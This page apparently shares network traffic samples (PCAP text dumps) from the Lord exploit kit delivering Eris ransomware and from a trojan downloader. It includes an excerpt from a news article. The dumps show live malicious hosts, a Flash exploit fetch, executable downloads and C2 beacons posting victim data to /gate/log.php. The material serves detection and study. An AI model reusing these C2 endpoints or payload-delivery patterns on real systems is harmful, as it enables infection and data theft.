Text Example

Lord Exploit Kit Exploiting Flash Vulnerability Delivering Eris Ransomware PCAP File Download Traffic Sample

2019-08-02 10:46:29.501586 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [P.], seq 1:326, ack 1, win 64240, length 325: HTTP: GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
E..m.y@…..
..e…….PM….Hg.P…….GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
DNT: 1
Connection: Keep-Alive
Host: 57189bbb.ngrok.io

2019-08-02 10:46:29.501716 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], ack 326, win 64240, length 0
E..(……U…..
..e.P…Hg.M..$P…l…
2019-08-02 10:46:29.666953 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], seq 1:1461, ack 326, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E………PB….
..e.P…Hg.M..$P…….HTTP/1.1 200 OK
Date: Fri, 02 Aug 2019 14:46:29 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked

4e91




2019-08-02 10:46:31.239216 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [.], ack 21872, win 64240, length 0
E..(..@…..
..e…….PM….H.tP…….
2019-08-02 10:46:31.297932 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [P.], seq 1799:2571, ack 21872, win 64240, length 772: HTTP: GET /?jS3YdHCaSi9dJ.swf HTTP/1.1
E..,..@…..
..e…….PM….H.tP…OC..GET /?jS3YdHCaSi9dJ.swf HTTP/1.1
Accept: /
Accept-Language: en-US
Referer: http://57189bbb.ngrok.io/?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3
x-flash-version: 28,0,0,161
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 57189bbb.ngrok.io
DNT: 1
Connection: Keep-Alive
Cookie: session=MTU2NDc1NzE5MHxEdi1CQkFFQ180SUFBUkFCRUFBQV82UF9nZ0FFQm5OMGNtbHVad3dGQUFORFZrVUdjM1J5YVc1bkRBOEFEVU5XUlMweU1ERTRMVFE0TnpnR2MzUnlhVzVuREFVQUEweE9Td1p6ZEhKcGJtY01KZ0FrYUhSMGNEb3ZMemd4TGpFM01TNHpNUzR5TkRjNk5EVTJOeTlUWlhKMlpYSXVaWGhsQm5OMGNtbHVad3dGQUFORldGUUdjM1J5YVc1bkRBVUFBMU5YUmdaemRISnBibWNNQlFBRFEwWkhCbk4wY21sdVp3d0pBQWRGV0ZCTVQwbFV8UvNtvJ8thZ9a7XPixQ5K3TO4K2XLuH7VZ0nrU5jUKqU=

2019-08-02 10:46:31.298032 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], ack 2571, win 64240, length 0
E..(……U…..
..e.P…H.tM…P…….
2019-08-02 10:46:31.441240 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], seq 21872:23332, ack 2571, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E………P…..
..e.P…H.tM…P…+…HTTP/1.1 200 OK
Content-Type: application/x-shockwave-flash
Date: Fri, 02 Aug 2019 14:46:30 GMT
Transfer-Encoding: chunked

2475
FWS$u$..x……p…..D………..application/x-shockwave-flashAdobe Flex 4 Applicationhttp://www.adobe.com/products/flexujwkgkcujwkgkcENSep 15, 2014.D…<.C….Z
………..Z……….e….

2019-08-02 10:47:11.656373 IP 10.8.2.101.49175 > 3.14.212.173.80: Flags [P.], seq 1:724, ack 1, win 64240, length 723: HTTP: GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
E…..@…..
..e…….PjTPv….P…>…GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 57189bbb.ngrok.io
DNT: 1
Connection: Keep-Alive
Cookie: session=MTU2NDc1NzE5MHxEdi1CQkFFQ180SUFBUkFCRUFBQV82UF9nZ0FFQm5OMGNtbHVad3dGQUFORFZrVUdjM1J5YVc1bkRBOEFEVU5XUlMweU1ERTRMVFE0TnpnR2MzUnlhVzVuREFVQUEweE9Td1p6ZEhKcGJtY01KZ0FrYUhSMGNEb3ZMemd4TGpFM01TNHpNUzR5TkRjNk5EVTJOeTlUWlhKMlpYSXVaWGhsQm5OMGNtbHVad3dGQUFORldGUUdjM1J5YVc1bkRBVUFBMU5YUmdaemRISnBibWNNQlFBRFEwWkhCbk4wY21sdVp3d0pBQWRGV0ZCTVQwbFV8UvNtvJ8thZ9a7XPixQ5K3TO4K2XLuH7VZ0nrU5jUKqU=

2019-08-02 10:47:11.656449 IP 3.14.212.173.80 > 10.8.2.101.49175: Flags [.], ack 724, win 64240, length 0
E..(.R….PV….
..e.P……jTSIP….a..
2019-08-02 10:47:11.842604 IP 3.14.212.173.80 > 10.8.2.101.49175: Flags [P.], seq 1:189, ack 724, win 64240, length 188: HTTP: HTTP/1.1 302 Found
E….T….O…..
..e.P……jTSIP…I…HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: http://google.com
Date: Fri, 02 Aug 2019 14:47:11 GMT
Content-Length: 40

Found.

2019-08-02 10:46:31.800847 IP 10.8.2.101.49164 > 81.171.31.247.4567: Flags [P.], seq 1:133, ack 1, win 64240, length 132
E…..@…{.
..eQ……….`.2.”P….+..GET /Server.exe HTTP/1.1
User-Agent: wininet
Host: 81.171.31.247:4567
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-02 10:46:31.800983 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], ack 133, win 64240, length 0
E..(……..Q…
..e…..2.”….P…G…
2019-08-02 10:46:31.977210 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [P.], seq 1:326, ack 133, win 64240, length 325
E..m……..Q…
..e…..2.”….P…….HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 1803776
Accept-Ranges: bytes
Server: HFS 2.3m
Set-Cookie: HFS_SID_=0.176216669380665; path=/; HttpOnly
ETag: 60A4822263437E51F0D4844D638C4DFA
Last-Modified: Fri, 02 Aug 2019 12:38:10 GMT
Content-Disposition: attachment; filename=”Server.exe”;

2019-08-02 10:46:34.864608 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 601786:603246, ack 133, win 64240, length 1460
E………..Q…
..e…..;……P……..l..Sam9..".P.s...Y.\.D3....rU......}ZZs.>.….h.(…ax….2.9…Y..A… …….-…..,..|..X.s.@. .. ].....+<.%.p!.q.DD..I..,...x.5.XL..+D... a\....iN.e.L P.B.#%p………..Cg…e…J.i.>…..t….B…..% …..K……l..2…..X.L..9.A…..U.z.$4E1..1..#?.%..I(…C..……K..x…….ax|’S.....<.6.T...e........Q:D.....e..w.....O..g".(.....J.....c…/….$,#GL..I.,.’P..9.;..uC. ….@kB.. E..p.g(0’Hu.=…….. &P..I}………….!g…n..$.(.i….,@5i.dD…..5..}..cm$#.R.. …{..L.?4…3……@Qe…b…g…N..!C….D..M.F…v.0. S.Z….. …..E=. …F.]…M.L..&.4..5..)..f.M.yE.X.h…..SP…;…….Er..?…,…..N..~?T’Q..;..hA)…”….E…-…….B^….KR.H. ..Z..M…..L8………G..8.p.S..[………0.~~….h….:.u3..U)A.H……p!..4D9.z@h.BG.V..Z-…I.,.. .p….[j…..9..i….<.=..8I….R.~. ..e..m0]..4/..0…..#….Yu….E….I…N.Y.4……..J… E.J.[).(-..QD..n..Ko…,W..>=.+610..M.=(Y/fk.Ys…f…,)……3 z@.V..)..)……..!.-9Z..O.1….u.C..Y…f{….5….J…..F…Y..8…^. .A……….#…….7/.cW………….n…L..K……...b..t.;.p..T....\.,....(,.*..y..9./..Mli.c...[...$G^.f...(..XOo...k....X.A;.1: P...mNqB....=..e... ....s..: ...'.%[.T..|7.pUG…6…..P.u…..1(ob(.!{……T..L….Tz……..I……Y….I….V..tMT..G;.k..5t.a.I.|X P:AC’.G.[..c…j…….W…u…..!2e.@…A..0Pnk…RI.8….i….
O.[……
x|u..&.@+<..T.k@D.T,…….6@.r.,.7.>..DHc….J.uB….%.Z.B…t.(4…A…X7…….@q].…B[D…cU… 2019-08-02 10:46:34.864636 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 603246:604706, ack 133, win 64240, length 1460 E………..Q… ..e…..;……P………. 54+0………L>……7Z…..%..m..Aj…I.TB..BM……L.p…. [.. …….m….1.jc…..|)J………n…k.S.y…..a.f..#,…..~.$..G.y.*2+.G.....S.z$E..~l....4P....U.LD.0X.\.C!.\> WRl......Xr...,... ..i..4J....UEHX_....R...H$.... BP..8.M$.o..0TEH_'...U....l...ri&..l…e…”$,b….j..” .L….[.. ……[F..l.K………^..T.2…D”.?.a!B…i…
/A.&7.EPG..a.B 8….* ..D:….A…&..s$ ..’. /...0).W.2...t*..E..3Z.)..7..8B...".5..1.8.*%L1....v..A.`.5.EIX......\P..<...@.t@...QC.u8 ..C.K..t0.0..M..V.rm...) ......G#...X.iv_.)+/<..u.%I.x.p....!,yQ/..R0.G..`...60.$Q.@N.....1y.;.. .4.....j...L.Cb.,.~2.......$;t.Q...w..@...!.d...*K.@f..[:.A..V..7.........A..... ...[...BJ.#....p.....Z 5_.4.2$........ttpP..W."s....w.S.. .y.Y36.xK.......:.\.....-.....7*.... .....!p.:!...R.i#,....92.d.C.......x...".......d.V..u....),"%.h]...a0..D....\..)..@aSS!t.4..V.(..04......[...IR@..H.!.F. .k]X.?.9..$...g.R.....-.3(.I...1 ..#&.@...i...b.B\%/.6.C..g...n..tEC6.>....t.A..t.fW........ockdC.Q.f bk...5.....?s..<.<....:..eJ_.9u.,.l.R..L...3.....Q..P.\.&..EX........OJ......e$3$...v|..3.hT..&._.-..,Q..m......e.. ..Z.L..m.ziv..X......o.7..5)=ls./;s..4ia...{QKD9.}R$ (.4..f.......Q..@.C..$M,...!....R#.. `_.....4[0..d )~......wH.6.$.S<,....C...,.y.gllll........M.P.3..). ..H....EZ.o {.$..T1...u..............$......C......M..A?.l..kO.QcK.C..S........ .#.$...?.(.0.s({.p..H.QB.....L.A.........B.<.5UCa.T.k$.k..C.=diMY...!Enq.h.GH1...,.\H"...u*.Q)....|.,......L....c.. M.E. 2019-08-02 10:46:34.864652 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 604706:606166, ack 133, win 64240, length 1460 E...........Q... ..e.....;.C....P.......q.Y,2,\..$..Dl...@6.P.......*T...u.+L....E.0.(...(..(.".... . )...X.H......`Z!`=.....M.M,..ahI\.. .]. #P.Yw...0... j .jPs...j9......8"P...S..4..\.>..W.......h...M.l.I.B.=...*i..8l..L.4..b'. .u. P..-.2 .o0...:...#p.........@....(..tg:%C...H.mZ.....!(.C.....$al_..`j....gD....H........ ..5,RL,1.-tW..pX. .... ]..."$`...!.k...p.3 L$g.6...A..=..r-._,..`...!.B.....!.bR.....pH.{.P...........C.....!t...F.X.......b.`1......A..`.)E.P....*e...,...\..w..4.]..<".H.#.Z.A4/.....0t...?yu.=...i.....m...;..A...u..r.E.......)....M..]'rH.jY $ ..%.$....-6..z E....m..#....u....4..&P.4......zO...../...(dk...\8Y.+..0%L..."...K<0<V.P3.8&.C.....iy<..!J.#.........7X ..M"..........?ghAl@ _.G.....b...q/2!y.,.........U.uI.5%h..ex, F..F..,.).jC. …4_LS..W..1j.?8+..)…J….-,.d……t@.q.. .P…….&.l..c<.05C..@…IP..i..n….,…,…tG..Y…..k2l..a. .9……hRQ{….q.{DHr..49......{D]I...w<....re.w ..9………….$..:…P..A..sV.C..T!…..7.|m..T_.U…..B…+e5B2.@.X…lDY..r.9!R?tJY2!.......dC.+n!s...... f.....&W..!...H!..4~~...L.w......R..L ..#....^0..4.h.<......\.$..Jq).( W..%T0D9.M..2@<.O..._.|4L....q...H. .>\F.._.....?("Jb.......$1...)y>a..,.......aM.....:.H.8B...a4;....V .....i x...W...:.i)%.VL.f@..C.W,.....W..Q=y..(....G..\2W..L...........*]b..q#...%2"..L...Hq...\..U ...K.$Cw.(b../Gh.XW.q..[.k%.A.W..0.&.".q)h.E<W................).#8.$2T0.I.FJ.A .{j.D".A.......8"6_L.O..>Pu/7u'bX.O.u!.....T.1.%w.:;].J........KRL.0...Ll....H(..X.I.. a..)..).H..l..w.k 2019-08-02 10:46:34.864666 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 606166:607626, ack 133, win 64240, length 1460 E...........Q... ..e.....;......P........%....0X.......y........S..@/........UA[HP[_.6kQ.h...4.<&.%.._..}\ ...._.>.,.[[<......XD.]F.N..... ........M.L..|...p ...y...Z...)...........A..{.....k[..X.i..v..i.v./...........….$. .E.8..F..I….H…..L…l..i…Y…..O.tK.D..Z..z.RF..RH.|C…0../.i…8%…%a., !’… .&…….u.D...!..h.Hh.8%..i.x…..B.5;.Q…..c$X.hY..@s=..13.0….yu.0.X..$k……J.~a…Z..>………8..$…Wi…..sX..`7.q.T.....C"pZR2E&.7#.OK.J...6. h....;..\$...$.....a..9.....L..qJ...n.H..._...<-..M[.6.....>L%....WdHg...d....^.|...&.b....]..s8...c.!qE.H....4.....W..)|...-Qg.F.(.>%...].{.n.Z.....a.e.........%Z7.v9..> 5P…..N ….D…’…1.0.0…#E…...].<..3?8….H’].L….B….8..N.RM^..)…..$p.u-……]. .7.- .@.H….c.@….7….6..6#..u…….@…V,B#-#q..:B…P.5E.P Z……..CJ..TR.x.T.x…y…..ki……….xg.x…….).P…..m.)2p.).C..5..1.~…Y..….2.”. ……E.8..|.+….9..….@.HTTP.%m.i../t5. .X.?.$.p3….W…….%l../G…d…#=..C.i…..……P9T…..;…ep.+..?…..?.p<.fP$..y..i..=.b…..Og..m….Ci..}..G.{.J!..,%.c.)..X….|.wz….G..BC…[..u.Q.A….pN….0..a…&..SB..B…I…..\Z( ….V…Iw…9j=.NDxi..$…….yk….8….a.P…5. Jx…..w!TI..0.gv..$t…..+…$…-.2’…Bt…!….E….n.H.k.. …..$……..P.#…Y..^@.j”/gHp…..j..R)z.(%-s……u.p..W.e@…^.(M ..0I…o?d\5.c…BB.@ .|d..G..*.7,..q.z!..s.l… .VD....u.0....#,...c4A..C..( ..u-..,7....%.'.j...K.(5PS_..N..9..Q...$y..t8..C ).=<.\...9.T....Yt.().!RpK..Ppy…..

2019-08-02 10:46:41.513341 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [P.], seq 1:304, ack 1, win 64240, length 303: HTTP: POST /api/v1/check HTTP/1.1
E..W..@…..
..e..P0…P..%..>C.P….K..POST /api/v1/check HTTP/1.1
Host: evilnnwzczbcbi4edpi4tx3khwbnty3obfhemd5i5gbyci3hxx3k5pad.onion.pet
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Content-Length: 26
Accept-Encoding: gzip

{“uid”:”d708005f8b8c91d1″}
2019-08-02 10:46:50.050263 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [P.], seq 1:466, ack 304, win 64240, length 465: HTTP: HTTP/1.1 200 OK
E….I……..P0
..e.P…>C…&0P…q|..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Fri, 02 Aug 2019 14:46:49 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 25
Connection: keep-alive
Set-Cookie: PHPSESSID=2ri00afk3bqb48pn4fg6sde643; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache
expires: 0

{“response”:””,”code”:0}

2019-08-02 10:46:50.050886 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [.], seq 304:1764, ack 466, win 63775, length 1460: HTTP: POST /api/v1/sync HTTP/1.1
E…..@…..
..e..P0…P..&0.>E.P…….POST /api/v1/sync HTTP/1.1
Host: evilnnwzczbcbi4edpi4tx3khwbnty3obfhemd5i5gbyci3hxx3k5pad.onion.pet
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Content-Length: 1844
Accept-Encoding: gzip

..6….U..!..,b.)..P...:.bao)..dW,......u._...mF...Ht..f2!d.._...Q!-P.....4.Ka".X../....)...A}.k.p.T.R(..5.....$.p.?..V.....uH........6.|"N.g...a@~w!.stwW.....K[C..8..-m..=.H*..#'0......…&..4..s..[9X:….6..g..u.
…2.X/&….h1.@I.E^’..~..z.......F5~..,.3p...$-l}.W..4? ...}7L...*|..s.(vr_.9……ys3.BH….”{Kt…L.N.Y….\3…..”Q….,2tP….k…….1…d$..#h…….<.S.r6.N_7…!’……b…H[.Lm.u.,.G..dRWPEX1.U……..i2..Z)o……I.n…/..)..C.Q……2.F[.{V…..*kQ. ^D….D…U….KI{.f.B…v…..?)….y…. ……7.z.Kq..Z.SF….k.yg”T….-…..Z.x.(…%igr.A …K.f…..D…..;.K……<.]…….C.8.0.l(B………p>-.u..~.GB..C..s.jJu.]..<.m..OgM….g..u……….5E.A……i:>……O..Rp..#?..M%...{....4@6...@.(.O....Rv.1.f{….y..Q../TB…L.SE..X.:t….J..LG}…D.Uu……….^.!.o.Qdy..3,Y…^.9…b…..9..X..Tj.
.i$f.1….A..E………1.S…j….R….5Wr…avO…..v..w2./…]3.W.>}l.1.x..3….0.<}…{“…r6);.$………..f/’…C.i.X>..s.<..B..J.fO.A.~&...H#..[.....9.8vA{....2e...T<..4Q.s. ..a)u]x|....e.\.3.h...eD.......}.M.18......U.a,E..$……..o.T.jH.dlS..SIw.4…..H…,C…7.+….j…….e.n.x..>qL.z..=.8.mly.(…oo.”……r…UK…?.4.$v.X.V
2019-08-02 10:46:50.050909 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [P.], seq 1764:2426, ack 466, win 63775, length 662: HTTP
E…..@…..
..e..P0…P..+..>E.P….~….
9`..c#.....M...>.......%...7.).....Q.._Cwj-..U..PA..Ru..^.q....0.....t"........r.g..C.n.v...o.?...gw.....}......V|....B~........._..^.l...}B..z.. -.eP.....!.r.Y.....&..^. ........sr...X.....V...'..o.........o...-v..:.G...:...../.."...&j.p..B50n+"..z......a.c.K...t.9..d.W..hc... .'....F.A._o.'^Ev....d...%.j..}.. .........V...sK....Y.........Z.c...]8..H..Vak...~Uk...*.R....}.T...$..J....Usey U..X>....a.....,..8.S..[^....q.c..>w........gi....d..LE.d......("a.. .g..HV.8\...re4. -/+?T.-C..3...a(....6.3...Z...lh.....!N(4...Pb_.}.......S.qY?...U...X...r..8... o...7..K........Gq:W..0.. ..A….`~…a8.
.,g……._&4.N….h…C.<.0..#…..}EQ.\9…….m…bT. 2019-08-02 10:46:50.050978 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [.], ack 1764, win 64240, length 0
E..(.J……..P0
..e.P…>E…+.P….f..
2019-08-02 10:46:50.051038 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [.], ack 2426, win 64240, length 0
E..(.K……..P0
..e.P…>E….zP…….
2019-08-02 10:46:58.858491 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [P.], seq 466:931, ack 2426, win 64240, length 465: HTTP: HTTP/1.1 200 OK
E….N……..P0
..e.P…>E….zP…W…HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Fri, 02 Aug 2019 14:46:58 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 25
Connection: keep-alive
Set-Cookie: PHPSESSID=s59ap5rdus4stk4ds1i5hfsmh1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache

NEW Flash Exploiting Lord EK Exploit Kit Found in the Wild PCAP Download Traffic Sample Analysis

A newly identified exploit kit is targeting vulnerable versions of Adobe’s Flash Player, Malwarebytes security researchers say.

Dubbed “Lord,” the exploit kit (EK) was initially identified by Virus Bulletin‘s Adrian Luca. The toolkit emerged as part of a malvertising chain via the PopCash ad network.

The EK uses a compromised website to redirect unsuspecting victims to its landing page. Initially, the portal was rather rudimentary and in clear text, but the toolkit operators quickly moved to obfuscate it. 

The landing page has a function to check for the presence of Flash Player, in an attempt to exploit the CVE-2018-15982 vulnerability.  One thing that sets the Lord EK apart from other toolkits is the use of the ngrok service to craft custom hostnames, which resulted in rather unusual URLs.  Source : https://www.securityweek.com/new-lord-exploit-kit-emerges

2019-08-01 13:19:06.834029 IP 10.8.1.102.65094 > 10.8.1.1.53: 46499+ A? 7b2cdd48.ngrok.io. (35)
E..?.s….#.
..f
….F.5.+……………7b2cdd48.ngrok.io…..
2019-08-01 13:19:06.891928 IP 10.8.1.1.53 > 10.8.1.102.65094: 46499 1/0/0 A 3.17.202.129 (51)
E..O!……U

..f.5.F.;……………7b2cdd48.ngrok.io…………………
2019-08-01 13:19:06.892846 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [S], seq 3866516344, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.t@…!P
..f…….P.v[x…… .s……………
2019-08-01 13:19:06.940656 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [S.], seq 2902076389, ack 3866516345, win 64240, options [mss 1460], length 0
E..,!…..?…..
..f.P….+..v[y`………..
2019-08-01 13:19:06.940887 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [.], ack 1, win 64240, length 0
E..(.w@…!Y
..f…….P.v[y..+.P…….
2019-08-01 13:19:06.941145 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [P.], seq 1:326, ack 1, win 64240, length 325: HTTP: GET /?GHRYb1AYhUQ7CY1Z3sfJHfdgiXnfmlZgiC2g7pV52z6UG8W3Lq4k0vs0ZIdzxVuY HTTP/1.1
E..m.x@… .
..f…….P.v[y..+.P…….GET /?GHRYb1AYhUQ7CY1Z3sfJHfdgiXnfmlZgiC2g7pV52z6UG8W3Lq4k0vs0ZIdzxVuY HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
DNT: 1
Connection: Keep-Alive
Host: 7b2cdd48.ngrok.io

2019-08-01 13:19:06.941243 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [.], ack 326, win 64240, length 0
E..(!…..?…..
..f.P….+..v.P….t..
2019-08-01 13:19:07.100312 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [.], seq 1:1461, ack 326, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E…!…..:E….
..f.P….+..v.P….-..HTTP/1.1 200 OK
Date: Thu, 01 Aug 2019 17:19:06 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked

4e91



POST /gate/log.php 31.210.171.200 Malware Dropper Trojan Downloader PCAP File Download Traffic Sample

2019-05-29 23:39:48.912311 IP 10.1.10.162.49184 > 10.1.10.224.80: Flags [P.], seq 3097589712:3097590130, ack 2503829794, win 16425, length 418: HTTP: GET /1.exe HTTP/1.1
E…..@…..
.
.
.
.. .P..w..=i”P.@)….GET /1.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-29 23:39:49.588931 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 109501:110961, ack 418, win 237, length 1460: HTTP
E…..@.@…
.
.
.
..P. .?….yrP…….@……….t…..H.F………82A……..F…..”A..7….X.F…..”A..&….d.F.3.ZYYd..h..A………]…d.F…..d.F…..d.F…..d.F…..d.F…..d.F…..d.F…..d.F…..d.F.p…d.F.q…d.F.r…d.F.s…d.F.t…d.F.u…
d.F.v…d.F.w…d.F.x…d.F.y…d.F.z…d.F.{…d.F.|…d.F.}…d.F.~…d.F…..d.F.`…d.F.a…d.F.b…d.F.c…d.F.d…d.F.e…d.F.f…d.F.g…d.F.h…d.F.i…d.F.j…d.F.k…d.F.l…d.F.m…d.F.n…d.F.o…d.F.P…d.F.Q…d.F.R…d.F
.S…d.F.T…d.F.U…d.F.V…d.F.W…d.F.X…d.F.Y…d.F.Z…d.F.[…d.F….d.F.]…d.F.^…d.F._…d.F.@…d.F.A…d.F.B…d.F.C…d.F.D…d.F.E…d.F.F…d.F.G…d.F.H…d.F.I…d.F.J…d.F.K…d.F.L…d.F.M…d.F.N…d.F.O…d.F.0.
..d.F.1…d.F.2…d.F.3…d.F.4…d.F.5…d.F.6…d.F.7…d.F.8…d.F.9…d.F.:…d.F.;…d.F.<…U..3.Uh..A.d.0d. ….F.3.ZYYd..h..A…6…..]….-..F…..A…TColor……….@.4.A………………………..4.A…..@w@..;@..;@..;@.. <@..;@.(9@.D9@..9@..EInvalidGraphic..A………………………….A…..@w@..;@..;@..;@..<@..;@.(9@.D9@..9@..EInvalidGraphicOperation.@…A.. TFontPitch………..A. fpDefault fpVariable.fpFixed.Graphics…A. TFontName…A…TFontCharset………. .A.. TFontStyle………..A..fsBold.fsItalic.fsUnderline.fsStrikeOut.Graphics..p.A…TFontStyles…A…..A.. TPenStyle………..A..psSolid.psDash.psDot psDashDot.psDashDotDot.psClear.psInsideFrame.Graphics…A…TPenMode………..A..p mBlack.pmWhite.pmNop.pmNot.pmCopy pmNotCopy.pmMergePe 2019-05-29 23:39:49.590576 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 173741:175201, ack 418, win 237, length 1460: HTTP
E…..@.@…
.
2019-05-29 23:40:00.458551 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 1054931223:1054931413, ack 2808420310, win 16425, length 190: HTTP: POST /gate/log.php HTTP/1.1
E…..@…..
.
……$.P>….e..P.@)….POST /gate/log.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Host: 31.210.171.200

2019-05-29 23:40:00.458560 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 190:345, ack 1, win 16425, length 155: HTTP
E…..@…..
.
……$.P>….e..P.@).2..params=Ym90X2lkPUYyQkMyQjBCLUM3MjYtNEVBMi04RjdELTVDMzA1NEQ4RkExRl9yeTR3biZjb25maWdfaWQ9NTkwMzI0ZDZkMzE1YjBmMDdmMDFkNjlkZWQ0MGNkYTM4NmZiMDk0NiZkYXRhPW51bGw=
2019-05-29 23:40:00.724098 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 1:567, ack 345, win 245, length 566: HTTP: HTTP/1.1 200 OK
E .^.o@.4…….
.
..P.$.e..>..pP…Y…HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 30 May 2019 03:40:00 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

15f
{“url”:”http://31.210.171.200/file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate”,”attachment_url”:”http://31.210.171.200/gate/sqlite3.dll”,”libraries”:”http://31.210.171.200/gate/libs.zip”,”ip”:”73.135.186.44″,”config”:{“masks”:null,”loader_urls”:null}}
0

2019-05-29 23:40:01.027541 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 1:567, ack 345, win 245, length 566: HTTP: HTTP/1.1 200 OK
E .^.p@.4…….
.
..P.$.e..>..pP…Y…HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 30 May 2019 03:40:00 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

15f
{“url”:”http://31.210.171.200/file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate”,”attachment_url”:”http://31.210.171.200/gate/sqlite3.dll”,”libraries”:”http://31.210.171.200/gate/libs.zip”,”ip”:”73.135.186.44″,”config”:{“masks”:null,”loader_urls”:null}}

2019-05-29 23:40:01.135113 IP 10.1.10.162.49189 > 31.210.171.200.80: Flags [P.], seq 2907559582:2907559879, ack 1455228641, win 16425, length 297: HTTP: GET /gate/sqlite3.dll HTTP/1.1
E..Q..@….Q
.
……%.P.M..V…P.@)i…GET /gate/sqlite3.dll HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
